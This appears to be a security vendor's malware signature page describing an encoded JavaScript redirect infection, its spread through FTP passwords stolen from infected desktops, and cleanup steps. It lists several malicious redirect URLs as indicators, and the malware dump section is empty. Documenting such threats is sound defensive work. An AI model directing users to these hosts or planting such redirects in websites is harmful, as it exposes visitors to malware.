Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: MW:JS:150

Description:This encoded javascript malware redirects the user to different domains, including:
http://breadcells.ru:8080/google.com/live.com/xunlei.com.php
http://icychina.ru:8080/google.com/mercadolibre.com.mx/google.com.ua.php ,
http://helphomecare.at:8080/google.com/download.com/qip.ru.php
http://passportblues.ru:8080/amazon-fr/google.com/miibeian.gov.cn.php
http://passportblues.ru:8080/google.com/bharatstudent.com/guardian.co.uk.php
http://dirtysin.ru:8080/wretch-cc/google.com/filestube.com.php
http://onelead.ru:8080/google.com/tube8.com/cncmax.cn.php
http://ourdope.ru:8080/google.com/friendster.com/37wan.com.php
http://beautyschooldropouts.com/wp-includes/wp-rss2.php
http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php
http://wap.northernplumbingandheating.com/assets/postinfo.php
http://paipai-com.cbssports.com.adbrite-com.clearsitedesign.ru:8080
http://sogpaoiy.the-mlmpowercall.com/USB.js

It can multiple directories named as google, mercadolibre, etc to try to disguise the user.

Affecting: The malware infects the web site through a compromised desktop (with virus), where it steals any stored password from the FTP client and uses that to attack the sites.

Clean up: The desktop must be cleanup first. Use multiple AVs if necessary, since this virus is very good at hiding from the current AV that is running. Once it is clean, then you can clean up the sites and change the passwords.

Malware dump:





For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb